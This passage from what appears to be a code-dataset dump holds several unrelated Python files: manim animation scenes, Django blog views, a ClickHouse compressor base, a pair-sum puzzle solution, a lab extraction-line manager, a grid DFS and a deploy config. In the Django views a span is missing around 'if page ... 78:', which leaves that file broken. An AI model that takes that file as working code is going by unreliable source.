__init__(self, **kwargs):\n super().__init__(**kwargs)\n root = self.MyEllipse()\n root.scale(0.5)\n root.to_corner(UP)\n\n child1 = self.MyEllipse()\n child1.scale(0.5)\n child1.next_to(root, 4 * DOWN + LEFT)\n\n child2 = self.MyEllipse()\n child2.scale(0.5)\n child2.next_to(root, 4 * DOWN + RIGHT)\n\n child11 = self.MyEllipse()\n child11.scale(0.5)\n child11.next_to(child1, 4 * DOWN + LEFT)\n\n child12 = self.MyEllipse()\n child12.scale(0.5)\n child12.next_to(child1, 4 * DOWN + RIGHT)\n\n child22 = self.MyEllipse()\n child22.scale(0.5)\n child22.next_to(child2, 4 * DOWN + RIGHT)\n\n child121 = self.MyEllipse()\n child121.scale(0.5)\n child121.next_to(child12, 4 * DOWN + LEFT)\n\n child122 = self.MyEllipse()\n child122.scale(0.5)\n child122.next_to(child12, 4 * DOWN + RIGHT)\n\n child1211 = self.MyEllipse()\n child1211.scale(0.5)\n child1211.next_to(child121, 4 * DOWN + LEFT)\n\n child1212 = self.MyEllipse()\n child1212.scale(0.5)\n child1212.next_to(child121, 4 * DOWN + RIGHT)\n\n arrow1 = Arrow(root.get_bottom(), child1.get_top(), stroke_width=3)\n arrow1.scale(0.8)\n\n arrow2 = Arrow(root.get_bottom(), child2.get_top())\n arrow2.scale(0.8)\n\n arrow11 = Arrow(child1.get_bottom(), child11.get_top())\n arrow11.scale(0.8)\n\n arrow12 = Arrow(child1.get_bottom(), child12.get_top())\n arrow12.scale(0.8)\n\n arrow22 = Arrow(child2.get_bottom(), child22.get_top())\n arrow22.scale(0.8)\n\n arrow121 = Arrow(child12.get_bottom(), child121.get_top())\n arrow121.scale(0.8)\n\n arrow122 = Arrow(child12.get_bottom(), child122.get_top())\n arrow122.scale(0.8)\n\n arrow1211 = Arrow(child121.get_bottom(), child1211.get_top())\n arrow1211.scale(0.8)\n\n arrow1212 = Arrow(child121.get_bottom(), child1212.get_top())\n arrow1212.scale(0.8)\n\n self.add(root, \n child1,\n child2,\n child11,\n child12,\n child22,\n child121,\n child122,\n child1211,\n child1212,\n arrow1,\n arrow2,\n arrow11,\n arrow12,\n arrow22,\n arrow121,\n arrow122,\n arrow1211,\n arrow1212,\n )\n \nclass RealWorld(Scene):\n def construct(self):\n algo_world, rect1 = self.get_algo_world()\n real_world, rect2 = self.get_real_world()\n arrow = self.get_arrow(rect1, rect2)\n\n self.play(Write(algo_world))\n self.wait(2)\n self.play(Write(rect1))\n self.wait(1)\n\n self.play(Write(arrow))\n\n self.play(Write(real_world))\n self.wait(2)\n self.play(Write(rect2))\n self.wait(12)\n\n def get_algo_world(self):\n t = Tree()\n t.scale(0.5)\n\n squares = [Square(side_length=0.5) for i in range(7)]\n boxes = VGroup(*squares).arrange(RIGHT, buff=0)\n\n lines = [\n \"for (i = 0; i < n; i++) \\{\",\n \"SPACEfor (j = 0; j < n; j++) \\{\",\n \"\\\\vdots\"\n ]\n codes = [Code(line) for line in lines]\n c = VGroup(*codes).arrange(DOWN).to_edge(RIGHT + DOWN)\n for i in range(0, len(codes)):\n x_diff = 1.4 + 0.65 * lines[i].count('SPACE')\n if 'vdots' in lines[i]:\n x_diff = 4.5\n codes[i].align_to((x_diff, 0, 0), LEFT)\n self.add(c)\n \n x = VGroup(t, boxes, c).arrange(DOWN, buff = LARGE_BUFF)\n x.scale(0.9)\n x.to_edge(LEFT, buff=LARGE_BUFF)\n return x, SurroundingRectangle(x)\n\n def get_real_world(self):\n r1 = SVGMobject(file_name = 'eagle-svgrepo-com.svg').scale(0.5)\n r2 = SVGMobject(file_name = 'mountain-climb-svgrepo-com.svg').scale(0.5)\n r3 = SVGMobject(file_name = 'hummingbird-svgrepo-com.svg').scale(0.5)\n r4 = SVGMobject(file_name = 'lion-face-svgrepo-com.svg').scale(0.5)\n r5 = SVGMobject(file_name = 'tree-swallow-svgrepo-com.svg').scale(0.5)\n\n x1 = VGroup(r1, r2).arrange(DOWN, buff = LARGE_BUFF)\n x2 = VGroup(r3, r4, r5).arrange(DOWN, buff 
= LARGE_BUFF)\n y = VGroup(x1, x2).arrange(RIGHT, buff = LARGE_BUFF)\n y.to_edge(RIGHT, buff=10*SMALL_BUFF + LARGE_BUFF)\n rect2 = SurroundingRectangle(y, buff=6*SMALL_BUFF)\n return y, rect2\n\n def get_arrow(self, rect1, rect2):\n return Arrow(rect1.get_right(), rect2.get_left())\n","sub_path":"vivek/vid_0003_selection_sort/scenes.py","file_name":"scenes.py","file_ext":"py","file_size_in_byte":7679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"453495044","text":"from django.shortcuts import render, redirect\nfrom .models import Post, BlogComment\nfrom django.contrib import messages\nfrom django.contrib.auth.models import User\nfrom django.http import HttpResponse\nimport math\nfrom django.core.paginator import Paginator # this for pagination\n\n\n# Create your views here.\n#def bloghome(request):\n# allposts = Post.objects.all()\n# context = {'allPosts': allposts}\n# return render(request, \"blog/blogHome.html\", context)\n\n\ndef bloghome(request):\n no_of_posts = 2\n #if request.GET(\"pageno\")\n page = request.GET.get('page')\n if page is None:\n page = 1\n else:\n page = int(page)\n\n\n \"\"\"\n 1: 0-3\n 2: 3-6\n 3: 6-9\n \n 1: 0 to 0 + no_of_posts\n 2: no_of_posts to no_of_posts + no_of_posts\n 3: no_of_posts + no_of_posts to no_of_posts+ no_of_posts +no_of_posts\n\n (page -1)* no_of_posts to page* no_of_posts\n \"\"\"\n\n allposts = Post.objects.all()\n length = len(allposts)\n allposts = allposts[(page-1)*no_of_posts: page* no_of_posts]\n if page>1:\n prev = page - 1\n else:\n prev = None\n\n if page 78:\n allPosts = Post.objects.none()\n else:\n allPostsTitle = Post.objects.filter(title__icontains=query)\n allPostsAuthor = Post.objects.filter(author__icontains=query)\n allPostsContent = Post.objects.filter(content__icontains=query)\n allPosts = allPostsTitle.union(allPostsContent, allPostsAuthor)\n\n # next for pagination...\n paginator = Paginator(allPosts, 1) # Show 5 posts per page.\n page_number = request.GET.get('page') \n page_obj = paginator.get_page(page_number)\n\n if allPosts.count() == 0:\n messages.warning(request, \"No search results found. 
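# --- editor's sketch ---
# The bloghome view above slices posts[(page-1)*n : page*n] by hand, exactly
# as its docstring derives. The same arithmetic as a self-contained helper
# with the page bounds made explicit (hypothetical helper, not from the record):
import math

def page_slice(items, page, per_page):
    last_page = max(1, math.ceil(len(items) / per_page))
    page = min(max(page, 1), last_page)               # clamp into valid range
    window = items[(page - 1) * per_page : page * per_page]
    prev_page = page - 1 if page > 1 else None
    next_page = page + 1 if page < last_page else None
    return window, prev_page, next_page

# e.g. page_slice(list(range(7)), 2, 2) -> ([2, 3], 1, 3)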
Please refine your query.\")\n params = {'allPosts': allPosts, 'query': query, 'page_obj': page_obj}\n return render(request, 'blog/search.html', params)\n\n\ndef blogPost(request, slug):\n post = Post.objects.filter(slug=slug).first()\n post.views = post.views + 1\n post.save()\n\n comments = BlogComment.objects.filter(post=post, parent=None)\n replies = BlogComment.objects.filter(post=post).exclude(parent=None)\n replyDict = {}\n for reply in replies:\n if reply.parent.sno not in replyDict.keys():\n replyDict[reply.parent.sno] = [reply]\n else:\n replyDict[reply.parent.sno].append(reply)\n context = {'post': post, 'comments': comments, 'user': request.user, 'replyDict': replyDict}\n\n return render(request, \"blog/blogPost.html\", context)\n\n\ndef postComment(request):\n if request.method == \"POST\":\n comment = request.POST.get('comment')\n user = request.user\n postSno = request.POST.get('postSno')\n post = Post.objects.get(sno=postSno)\n parentSno = request.POST.get('parentSno')\n if parentSno == \"\":\n comment = BlogComment(comment=comment, user=user, post=post)\n comment.save()\n messages.success(request, \"Your comment has been posted successfully\")\n else:\n parent = BlogComment.objects.get(sno=parentSno)\n comment = BlogComment(comment=comment, user=user, post=post, parent=parent)\n comment.save()\n messages.success(request, \"Your reply has been posted successfully\")\n\n return redirect(f\"/blog/{post.slug}/\")","sub_path":"blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"306849342","text":"from io import BytesIO\n\ntry:\n from clickhouse_cityhash.cityhash import CityHash128\nexcept ImportError:\n raise RuntimeError(\n 'Package clickhouse-cityhash is required to use compression'\n )\n\nfrom .. 
import errors\n\n\nclass BaseCompressor(object):\n \"\"\"\n Partial file-like object with write method.\n \"\"\"\n method = None\n method_byte = None\n\n def __init__(self):\n self.data = BytesIO()\n\n super(BaseCompressor, self).__init__()\n\n def get_value(self):\n value = self.data.getvalue()\n self.data.seek(0)\n self.data.truncate()\n return value\n\n def write(self, p_str):\n self.data.write(p_str)\n\n def get_compressed_data(self, extra_header_size):\n raise NotImplementedError\n\n\nclass BaseDecompressor(object):\n method = None\n method_byte = None\n\n def __init__(self, real_stream):\n self.stream = real_stream\n super(BaseDecompressor, self).__init__()\n\n def check_hash(self, compressed_data, compressed_hash):\n if CityHash128(compressed_data) != compressed_hash:\n raise errors.ChecksumDoesntMatchError()\n\n def get_decompressed_data(self, method_byte, compressed_hash,\n extra_header_size):\n raise NotImplementedError\n","sub_path":"clickhouse_driver/compression/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":1276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"181550883","text":"\ndef load_data(name):\n data = []\n with open(f'./{name}') as f:\n size = f.readline()\n size = int(size)\n sum = 0\n for line in f:\n try:\n f_v, s_v = line.split(' ')\n except:\n f_v, s_v = line.split(' ')\n f_v = int(f_v)\n s_v = int(s_v)\n difference = abs(f_v - s_v)\n data.append([f_v, s_v, difference])\n sum += max(f_v, s_v)\n return size, data, sum\n\n\ndef search_max_sum(name):\n size, data, sum = load_data(name)\n while (sum % 3) == 0:\n min_dif = 300000\n pair_index = 0\n for i in range(0, size):\n dif_pair = data[i][2]\n\n if min_dif > dif_pair and dif_pair % 3 != 0:\n min_dif = dif_pair\n pair_index = i\n f_v = data[pair_index][0]\n s_v = data[pair_index][1]\n sum -= max([f_v, s_v])\n sum += min([f_v, s_v])\n\n if sum % 3 == 0:\n data[pair_index][2] = 300000\n sum += max([f_v, s_v])\n sum -= min([f_v, s_v])\n print(sum)\n\n\ndef main():\n file_name = ['27-A.txt', '27-B.txt']\n for name in file_name:\n search_max_sum(name)\n\n\nmain()\n","sub_path":"task-27.py","file_name":"task-27.py","file_ext":"py","file_size_in_byte":1220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"441055475","text":"#===============================================================================\n# Copyright 2011 Jake Ross\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#===============================================================================\n#=============enthought library imports=======================\nfrom traits.api import Instance\nfrom traitsui.api import View, Item, VSplit\n#=============standard library imports ========================\nimport os\nimport time\nfrom threading import Thread, Event\nimport pickle\n#=============local library imports ==========================\nfrom src.extraction_line.explanation.extraction_line_explanation import 
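# --- editor's worked example for the task-27 strategy above ---
# Greedy idea: take max(a, b) from every pair; if the total is divisible by 3,
# downgrade the one pair where switching max -> min costs least, i.e. the pair
# with the smallest |a - b| that is NOT divisible by 3 (a swap whose difference
# is a multiple of 3 cannot change sum % 3):
pairs = [(5, 2), (7, 6), (9, 9)]
total = sum(max(a, b) for a, b in pairs)      # 5 + 7 + 9 = 21, divisible by 3
if total % 3 == 0:
    # differences: 3 (skipped, multiple of 3), 1, 0 (skipped) -> cheapest is 1
    cheapest = min((abs(a - b) for a, b in pairs if abs(a - b) % 3), default=None)
    if cheapest is not None:
        total -= cheapest                      # 21 - 1 = 20, and 20 % 3 == 2
print(total)                                   # -> 20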
ExtractionLineExplanation\nfrom src.extraction_line.extraction_line_canvas import ExtractionLineCanvas\nfrom src.paths import paths\nfrom src.managers.manager import Manager\nfrom src.pyscripts.manager import PyScriptManager\nfrom src.monitors.system_monitor import SystemMonitor\n\nfrom view_controller import ViewController\n# from src.managers.multruns_report_manager import MultrunsReportManager\n\n# Macro = None\n# start_recording = None\n# stop_recording = None\n# play_macro = None\n\n\nclass ExtractionLineManager(Manager):\n '''\n Manager for interacting with the extraction line\n contains 2 interaction canvases, 2D and 3D\n contains reference to valve manager, gauge manager and laser manager\n \n '''\n canvas = Instance(ExtractionLineCanvas)\n explanation = Instance(ExtractionLineExplanation, ())\n\n valve_manager = Instance(Manager)\n gauge_manager = Instance(Manager)\n# environmental_manager = Instance(Manager)\n# device_stream_manager = Instance(Manager)\n multiplexer_manager = Instance(Manager)\n multruns_report_manager = Instance(Manager)\n# multruns_report_manager = Instance(MultrunsReportManager)\n\n view_controller = Instance(ViewController)\n\n# pumping_monitor = Instance(PumpingMonitor)\n\n runscript = None\n\n pyscript_editor = Instance(PyScriptManager)\n monitor = Instance(SystemMonitor)\n\n learner = None\n mode = 'normal'\n _update_status_flag = None\n _monitoring_valve_status = False\n _valve_state_frequency = 3\n _valve_lock_frequency = 10\n\n def test_connection(self):\n return self.get_valve_states() is not None\n\n def get_subsystem_module(self, subsystem, module):\n '''\n '''\n try:\n ss = getattr(self, subsystem)\n return ss.get_module(module)\n except AttributeError:\n self.warning('{} not initialized'.format(subsystem))\n\n\n def _create_manager(self, klass, manager, params, **kw):\n gdict = globals()\n if klass in gdict:\n class_factory = gdict[klass]\n else:\n # try a lazy load of the required module\n if 'fusions' in manager:\n package = 'src.managers.laser_managers.{}'.format(manager)\n self.laser_manager_id = manager\n elif 'rpc' in manager:\n package = 'src.rpc.manager'\n else:\n package = 'src.managers.{}'.format(manager)\n\n class_factory = self.get_manager_factory(package, klass, warn=False)\n if class_factory is None:\n package = 'src.extraction_line.{}'.format(manager)\n class_factory = self.get_manager_factory(package, klass)\n\n if class_factory:\n# params['application'] = self.application\n m = class_factory(**params)\n\n if manager in ['gauge_manager',\n 'valve_manager',\n 'multiplexer_manager',\n # 'environmental_manager', 'device_stream_manager',\n 'multruns_report_manager',\n ]:\n self.trait_set(**{manager:m})\n else:\n self.add_trait(manager, m)\n\n # m.exit_on_close = False\n\n return m\n\n def finish_loading(self):\n '''\n '''\n if self.mode != 'client':\n self.monitor = SystemMonitor(manager=self,\n name='system_monitor'\n )\n self.monitor.monitor()\n\n# if self.gauge_manager is not None:\n# self.gauge_manager.on_trait_change(self.pressure_update, 'gauges.pressure')\n# def close(self, isok):\n# e = self.explanation\n# self.valve_manager.on_trait_change(e.load_item, 'explanable_items[]')\n def closed(self, ok):\n self.info('stopping status monitor')\n if self._update_status_flag:\n self._update_status_flag.set()\n\n if self.gauge_manager:\n self.gauge_manager.stop_scans()\n\n if self.monitor:\n self.monitor.stop()\n return True\n\n def opened(self, ui):\n super(ExtractionLineManager, self).opened(ui)\n self.reload_scene_graph()\n p = 
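# --- editor's sketch ---
# _create_manager above first checks globals(), then lazily imports a module
# path derived from the manager name. The stdlib equivalent of that lookup,
# assuming the module really exposes the class (names here are illustrative):
import importlib

def load_class(package, klass):
    try:
        module = importlib.import_module(package)  # e.g. 'src.managers.gauge_manager'
        return getattr(module, klass)              # e.g. 'GaugeManager'
    except (ImportError, AttributeError):
        return None                                # caller falls back to the next package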
os.path.join(paths.hidden_dir, 'show_explanantion')\n if os.path.isfile(p):\n with open(p, 'rb') as f:\n try:\n self.show_explanation = pickle.load(f)\n except pickle.PickleError:\n pass\n\n if self.mode == 'client':\n self.start_status_monitor()\n else:\n if self.gauge_manager:\n self.info('start gauge scans')\n self.gauge_manager.start_scans()\n\n def start_status_monitor(self):\n def func():\n self._monitoring_valve_status = True\n cnt = 0\n state_freq = self._valve_state_frequency\n lock_freq = self._valve_lock_frequency\n vm = self.valve_manager\n while not self._update_status_flag.isSet():\n time.sleep(1)\n if cnt % state_freq == 0:\n vm.load_valve_states()\n if cnt % lock_freq == 0:\n vm.load_valve_lock_states()\n\n cnt += 1\n if cnt > 100:\n cnt = 0\n\n self.info('status monitor stopped')\n self._monitoring_valve_status = False\n\n if self._update_status_flag is None:\n self._update_status_flag = Event()\n\n self._update_status_flag.clear()\n if self.isMonitoringValveState():\n self.info('monitor already running')\n else:\n t = Thread(target=func)\n t.start()\n self.info('starting status monitor')\n\n def isMonitoringValveState(self):\n return self._monitoring_valve_status\n# return self._update_status_flag.isSet()\n\n def bind_preferences(self):\n from apptools.preferences.preference_binding import bind_preference\n bind_preference(self.canvas, 'style', 'pychron.extraction_line.style')\n bind_preference(self.canvas, 'width', 'pychron.extraction_line.width')\n bind_preference(self.canvas, 'height', 'pychron.extraction_line.height')\n\n bind_preference(self, 'enable_close_after', 'pychron.extraction_line.enable_close_after')\n bind_preference(self, 'close_after_minutes', 'pychron.extraction_line.close_after')\n\n# from src.extraction_line.plugins.extraction_line_preferences_page import get_valve_group_names\n#\n# for name in get_valve_group_names():\n# self.add_trait(name, Str(''))\n# self.on_trait_change(self._owner_change, name)\n# bind_preference(self, name, 'pychron.extraction_line.{}'.format(name))\n\n def _owner_change(self, name, value):\n self.valve_manager.claim_section(name.split('_')[0], value.lower)\n\n def reload_scene_graph(self):\n iddict = dict()\n # remember the explanation settings\n exp = self.explanation\n if exp:\n for ev in exp.explanable_items:\n i = ev.identify\n iddict[ev.name] = i\n\n if self.canvas is not None:\n if self.canvas.style == '2D':\n p = os.path.join(paths.canvas2D_dir, 'canvas.xml')\n self.canvas.load_canvas_file(p)\n# else:\n# self.canvas.canvas3D.setup() # canvas3D_dir, 'extractionline3D.txt')\n# if self.canvas.style == '2D':\n# # self.canvas.invalidate_and_redraw()\n# else:\n# if self.canvas is not None:\n\n # load state\n if self.valve_manager:\n for k, v in self.valve_manager.valves.iteritems():\n vc = self.canvas.get_object(k)\n if vc:\n vc.soft_lock = v.software_lock\n v.canvas_valve = vc\n# vc.state = v.state\n\n try:\n vc.identify = iddict[vc.name]\n except:\n pass\n\n# self.canvas.Refresh()\n# self.view_controller = self._view_controller_factory()\n\n def load_canvas(self):\n '''\n '''\n p = self._file_dialog_('open', **dict(default_dir=paths.canvas2D_dir))\n\n if p is not None:\n self.canvas.load_canvas(p)\n\n# def pressure_update(self, o, oo, n):\n# '''\n# on_trait_change handler for gauge_manager.gauges.pressure\n#\n# '''\n# if self.canvas:\n# self.canvas.update_pressure(o.name, n, o.state)\n def update_valve_state(self, *args, **kw):\n if self.canvas:\n self.canvas.update_valve_state(*args, **kw)\n\n def 
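# --- editor's sketch ---
# start_status_monitor above loops on time.sleep(1) and re-checks an Event once
# per second. Event.wait(timeout) gives the same cadence but wakes immediately
# when stop() sets the flag (illustrative names, not the record's API):
import threading

class Poller:
    def __init__(self, poll, interval=1.0):
        self._poll, self._interval = poll, interval
        self._stop = threading.Event()
        self._thread = threading.Thread(target=self._run, daemon=True)

    def _run(self):
        # wait() returns False on timeout, True as soon as stop() sets the flag
        while not self._stop.wait(self._interval):
            self._poll()

    def start(self):
        self._thread.start()

    def stop(self):
        self._stop.set()
        self._thread.join()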
update_valve_lock_state(self, *args, **kw):\n if self.canvas:\n self.canvas.update_valve_lock_state(*args, **kw)\n\n# def update_canvas2D(self, *args):\n# if self.canvas:\n# self.canvas.canvas2D.update_valve_state(*args)\n\n def show_valve_properties(self, name):\n if self.valve_manager is not None:\n self.valve_manager.show_valve_properties(name)\n\n def get_software_lock(self, name, **kw):\n if self.valve_manager is not None:\n return self.valve_manager.get_software_lock(name, **kw)\n\n def set_software_lock(self, name, lock):\n if self.valve_manager is not None:\n if lock:\n self.valve_manager.lock(name)\n else:\n self.valve_manager.unlock(name)\n\n def get_valve_lock_states(self):\n if self.valve_manager is not None:\n return self.valve_manager.get_software_locks()\n\n def get_valve_state(self, name=None, description=None):\n if self.valve_manager is not None:\n if description is not None and description.strip():\n return self.valve_manager.get_state_by_description(description)\n else:\n return self.valve_manager.get_state_by_name(name)\n\n def get_valve_states(self):\n if self.valve_manager is not None:\n return self.valve_manager.get_states()\n\n def get_valve_by_name(self, name):\n if self.valve_manager is not None:\n return self.valve_manager.get_valve_by_name(name)\n\n# def open_valve(self, name, description=None, address=None, mode='remote', **kw):\n def get_pressure(self, controller, name):\n if self.gauge_manager:\n return self.gauge_manager.get_pressure(controller, name)\n\n def disable_valve(self, description):\n self._enable_valve(description, False)\n\n def enable_valve(self, description):\n self._enable_valve(description, True)\n\n def _enable_valve(self, description, state):\n if self.valve_manager:\n valve = self.valve_manager.get_valve_by_description(description)\n if valve is None:\n valve = self.valve_manager.get_valve_by_name(description)\n\n if valve is not None:\n if not state:\n self.close_valve(valve.name)\n\n valve.enabled = state\n\n\n def open_valve(self, name, ** kw):\n '''\n '''\n return self._open_close_valve(name, 'open', **kw)\n\n def close_valve(self, name, **kw):\n '''\n '''\n return self._open_close_valve(name, 'close', **kw)\n\n def _open_close_valve(self, name, action,\n description=None, address=None, mode='remote', **kw):\n vm = self.valve_manager\n if vm is not None:\n if address:\n name = vm.get_name_by_address(address)\n\n if description and description != '---':\n name = vm.get_name_by_description(description)\n\n result = self._change_valve_state(name, mode, action, **kw)\n\n# if self.learner:\n# self.learner.open_close_valve(name, action, result)\n\n return result\n\n def sample(self, name, **kw):\n def sample():\n valve = self.valve_manager.get_valve_by_name(name)\n if valve is not None:\n self.info('start sample')\n self.open_valve(name, **kw)\n time.sleep(valve.sample_period)\n\n self.info('end sample')\n self.close_valve(name, **kw)\n\n t = Thread(target=sample)\n t.start()\n\n def cycle(self, name, **kw):\n def cycle():\n\n valve = self.valve_manager.get_valve_by_name(name)\n if valve is not None:\n n = valve.cycle_n\n period = valve.cycle_period\n\n self.info('start cycle n={} period={}'.format(n, period))\n for i in range(n):\n self.info('valve cycling iteration ={}'.format(i + 1))\n self.open_valve(name, **kw)\n time.sleep(period)\n self.close_valve(name, **kw)\n time.sleep(period)\n\n t = Thread(target=cycle)\n t.start()\n\n def claim_group(self, *args):\n return self.valve_manager.claim_group(*args)\n\n def release_group(self, 
*args):\n return self.valve_manager.release_group(*args)\n\n def _change_valve_state(self, name, mode, action, sender_address=None):\n\n func = getattr(self.valve_manager, '{}_by_name'.format(action))\n\n# owned = False\n# try:\n# claimer = self.valve_manager.get_system(sender_address)\n# if claimer:\n# owned = self.valve_manager.check_group_ownership(name, claimer)\n# except AttributeError:\n# #no systems are defined\n# pass\n\n result, change = func(name, mode=mode)\n# change = False\n# if not owned:\n# result, change = func(name, mode=mode)\n# else:\n# result = '{} owned by {}'.format(name, claimer)\n# self.warning(result)\n\n# system,f ok = self.valve_manager.check_ownership(name, sender_address)\n# # ok = True\n# if ok:\n# critical = self.valve_manager.check_critical_section()\n# if not critical:\n# result = func(name, mode=mode)\n# else:\n# result = '{} critical section enabled'.format(name)\n# self.warning(result)\n# else:\n if isinstance(result, bool):\n # valve state show as changed if even it didnt actuate\n# if result:\n if change:\n self.canvas.update_valve_state(name, True if action == 'open' else False)\n# result = True\n\n return result, change\n\n# def execute_run_script(self, runscript_name):\n# runscript_dir = os.path.join(paths.scripts_dir, 'runscripts')\n# if self.runscript is None:\n# e = ExtractionLineScript(source_dir=runscript_dir ,\n# file_name=runscript_name,\n# manager=self,\n#\n# )\n#\n# e.bootstrap()\n# elif self.runscript.isAlive():\n# self.warning('{} already running'.format(runscript_name))\n# else:\n# self.runscript = None\n\n def execute_pyscript(self, name):\n if not name.endswith('.py'):\n name += '.py'\n\n p = os.path.join(paths.scripts_dir, 'pyscripts', name)\n if not os.path.isfile(p):\n return p\n\n pe = self.pyscript_editor\n return pe.execute_script(path=p)\n\n def get_script_state(self, key):\n return self.pyscript_editor.get_script_state(key)\n\n def set_selected_explanation_item(self, obj):\n if self.explanation:\n selected = next((i for i in self.explanation.explanable_items if obj.name == i.name), None)\n if selected:\n self.explanation.selected = selected\n\n def traits_view(self):\n '''\n '''\n v = View(\n VSplit(\n Item('gauge_manager',\n style='custom', show_label=False,\n height=0.2,\n springy=False,\n defined_when='gauge_manager'\n ),\n Item('canvas',\n style='custom',\n show_label=False,\n height=0.8)\n ),\n handler=self.handler_klass,\n title='Extraction Line Manager',\n resizable=True,\n id='pychron.extraction_line_window'\n )\n return v\n\n#=================== factories ==========================\n\n def _view_controller_factory(self):\n if self.canvas.canvas3D:\n v = ViewController(scene_graph=self.canvas.canvas3D.scene_graph)\n self.canvas.canvas3D.user_views = v.views\n return v\n\n def _valve_manager_changed(self):\n e = self.explanation\n if self.valve_manager is not None and e is not None:\n e.load(self.valve_manager.explanable_items)\n self.valve_manager.on_trait_change(e.load_item, 'explanable_items[]')\n# self.valve_manager.mode = self.mode\n#=================== defaults ===========================\n# def _view_controller_default(self):\n# return self._view_controller_factory()\n def _pyscript_editor_default(self):\n return PyScriptManager(parent=self)\n\n def _valve_manager_default(self):\n from src.extraction_line.valve_manager import ValveManager\n return ValveManager(extraction_line_manager=self)\n\n# def _gauge_manager_default(self):\n# from src.extraction_line.gauge_manager import GaugeManager\n# return 
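# --- editor's sketch ---
# _change_valve_state above builds a method name from the action string
# ('open' -> open_by_name) and fetches it with getattr. Whitelisting the
# action first keeps a bad string from reaching getattr (stand-in class,
# not the record's ValveManager):
class ValveManagerStub:
    def open_by_name(self, name, mode='remote'):
        return True, True

    def close_by_name(self, name, mode='remote'):
        return True, True

ACTIONS = {'open', 'close'}

def change_valve_state(vm, name, action, mode='remote'):
    if action not in ACTIONS:
        raise ValueError('unknown valve action: %r' % action)
    return getattr(vm, '{}_by_name'.format(action))(name, mode=mode)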
GaugeManager()\n\n def _explanation_default(self):\n# '''\n# '''\n e = ExtractionLineExplanation()\n if self.valve_manager is not None:\n e.load(self.valve_manager.explanable_items)\n self.valve_manager.on_trait_change(e.load_item, 'explanable_items[]')\n\n return e\n\n def _canvas_default(self):\n '''\n '''\n return ExtractionLineCanvas(manager=self)\n\n# def _pumping_monitor_default(self):\n# '''\n# '''\n# return PumpingMonitor(gauge_manager=self.gauge_manager,\n# parent=self)\n\n# def _multruns_report_manager_default(self):\n# return MultrunsReportManager(application=self.application)\nif __name__ == '__main__':\n elm = ExtractionLineManager()\n elm.bootstrap()\n elm.canvas.style = '2D'\n elm.configure_traits()\n\n#=================== EOF ================================\n# def add_extraction_line_macro_delay(self):\n# global Macro\n# if Macro is None:\n# from macro import _Macro_ as Macro\n#\n# info = Macro.edit_traits()\n# if info.result:\n# Macro.record_action(('delay', Macro.delay))\n#\n# def stop_extraction_line_macro_recording(self):\n# global stop_recording\n# if stop_recording is None:\n# from macro import stop_recording\n# stop_recording()\n#\n# def start_extraction_line_macro_recording(self):\n# global start_recording\n# if start_recording is None:\n# from macro import start_recording\n# start_recording()\n#\n# def play_extraction_line_macro_recording(self):\n# #lazy pre_start time and Thread\n# global time\n# if time is None:\n# import time\n#\n# global Thread\n# if Thread is None:\n# from threading import Thread\n#\n# global play_macro\n# if play_macro is None:\n# from macro import play_macro\n#\n# def _play_():\n# for c in play_macro():\n# args = c[0]\n# kw = c[1]\n#\n# if args == 'delay':\n#\n# time.sleep(kw)\n# else:\n# action = args[3]\n# name = args[1]\n#\n# func = getattr(self, '%s_valve' % action)\n# func(name, mode = 'manual')\n#\n# t = Thread(target = _play_)\n# t.start()\n","sub_path":"src/extraction_line/extraction_line_manager.py","file_name":"extraction_line_manager.py","file_ext":"py","file_size_in_byte":21322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"154611540","text":"def dfs(x,y):\n if x<=-1 or x>=n or y<=-1 or y>=m:\n return False\n \n if route[x][y]==0:\n route[x][y]=1\n\n dfs(x-1,y)\n dfs(x,y-1)\n dfs(x+1,y)\n dfs(x,y+1)\n return True\n return False\n\n\nn,m = map(int, input().split())\n\nroute=[list(map(int,input())) for _ in range(n)]\n\n\nresult = 0\n\nfor i in range(n):\n for j in range(m):\n if dfs(i,j)==True:\n result+=1\n\n\nprint(result)","sub_path":"BFS&DFS/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"396666323","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom Biuploy._config.conf import PACKGETIME\n\n#1.check\n#if true deploy or not ; True / False\nDEBUG = True\n\n#2.检查代码使用版本号\n#source svn version like 750\nSOURCE_VERSION = None\n\n#3.检查安装包为主线还是企业\n#build mode 'main'/'client'\nBUILD_MODE = 'main'\n\n#4.检查打包的部署方式\n#deploy mode 'old'/'test'/'cloud'/'custom'\nDEPLOY_MODE = 'cloud'\n\n#5.检查使用的主线版本\n#main version like '5.2'\nMAIN_VERSION = '5.2'\n\n#6.检查主线轮次号\n#main release like 4\nMAIN_RELEASE = 5\n\n#7.检查主线升级号\n#main build number like 80\nMAIN_BUILD = 74\n\n#8.检查企业版轮次号\n#client release like 4\nCLIENT_RELEASE = 4\n\n#9.检查企业版升级号\n#client build like 80\nCLIENT_BUILD = 83\n\n#10.检查企业版版本号\n#client release like 140\nCLIENT_VERSION = 
